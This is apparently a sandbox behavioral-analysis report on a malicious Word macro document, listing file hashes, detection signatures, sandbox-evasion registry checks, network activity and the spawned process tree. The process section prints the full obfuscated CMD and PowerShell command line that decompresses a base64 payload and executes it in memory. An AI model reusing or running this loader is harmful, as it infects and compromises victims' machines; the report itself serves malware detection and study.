Analysis
-
max time kernel
139s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 18:52
Behavioral task
behavioral1
Sample
4293980a40e32263689adc31d09586ba_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
4293980a40e32263689adc31d09586ba_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
4293980a40e32263689adc31d09586ba_JaffaCakes118.doc
-
Size
67KB
-
MD5
4293980a40e32263689adc31d09586ba
-
SHA1
0410bb681609ba26a916cf924cd5ec9f952d7ddb
-
SHA256
7a7a96dea01318105b9ca22bb0e951f9475c1d0573fcbeabc33e10fd1ab56c41
-
SHA512
0e0deeb21e3b5b60fbaa8f62b0a054e1de90f9f8f806b7fcf77e688c23830e0f19fe743b5db81bdb875afd78d7d5bcfe5607d67aebc547ee8193f1cfc980445c
-
SSDEEP
768:Q/ZVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9KPVORZ1u2O7VQnoL:EZocn1kp59gxBK85fBt+a9KMRvi
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4836 4800 CMD.exe 84 -
Blocklisted process makes network request 6 IoCs
flow pid Process 26 5068 powershell.exe 39 5068 powershell.exe 46 5068 powershell.exe 50 5068 powershell.exe 52 5068 powershell.exe 53 5068 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4800 WINWORD.EXE 4800 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5068 powershell.exe 5068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5068 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4800 wrote to memory of 4836 4800 WINWORD.EXE 90 PID 4800 wrote to memory of 4836 4800 WINWORD.EXE 90 PID 4836 wrote to memory of 5068 4836 CMD.exe 92 PID 4836 wrote to memory of 5068 4836 CMD.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4293980a40e32263689adc31d09586ba_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SYSTEM32\CMD.exeCMD C:\WINDowS\systEm32\CMD.exE /C "set kidZ= . ( $sHellid[1]+$SHELlID[13]+'X')(new-oBject sySTEM.IO.comPRESSiON.deFLatesTreaM( [IO.MeMOrYStReAM][CONVERT]::fRoMbASE64stRINg('NZBBawIxEIX/yh4CUazJzWrDgqViEVEPFraFXrJxiqnZSZqdNWvF/95V6vV9bz6Yx5azTY6Qhr78BkPZGkgUUL44C0iKbdfPOd8ThScpbWiM07XxzqKuhfGVHLej7bxNj9P/Sh2aGKKv/I2WE/hYFKs7TCmJGkwE0tFqaAmwth5FgyRg1wgdZQpD47EDJMvl/Y7AuRPp3UELBJJJb/Tb7PdOwflK1I08crENzlKPT3lfsR8sszzjo/GEK/b6XuQM8PhEUIUB/+SDKx9wAS1w9eUjaLPvsaJZZRaz69P9M8XTmXXjiJlP6Lzeza2DW+chuwr7aoFHf4DhopPeElV2noO6GE1mf75c/gA='), [syStEM.io.cOmprEsSIoN.compRESsiONMODe]::dECOMpREsS ) ^|% {new-oBject iO.STrEamREADEr($_,[sYStEM.TexT.eNCoDinG]::AsCII)}).ReaDTOENd( ) && powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
787B
MD593ae81f42df855abaa8d0a11ef35f5a1
SHA15aebc17ae633659a48775a460fc72fe4768a1fa1
SHA256ae76dfa0d9ce93ca1c0081b3a6d5ed417f6f9f36250b3f7ed9186610e6465f23
SHA51234dcd8320acbe3611e144d843c5b8346ba8892ccb21359fa2963da70f424e41fc0d07aae607e37abc581109991aa4c7d8c47d62127cb1cf4934187e03d0a2671
-
Filesize
67KB
MD552fb9831dd12a8067f86dfe11f6776f3
SHA19d5f8e00cb8872db5f323271a5ccf7e7298046a0
SHA25632dd71e653511fe3a68a5c17f84dddbe08de6dd6fc587cba67cc294d712f8504
SHA512c69a5a575990a1fcd54c87089a51a82210e24407f7cabc14dc050b9451cff1b9076d2ab9bc963ded86c495bad3256d6efcf9551fd287f86ad30488590e530ab3
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82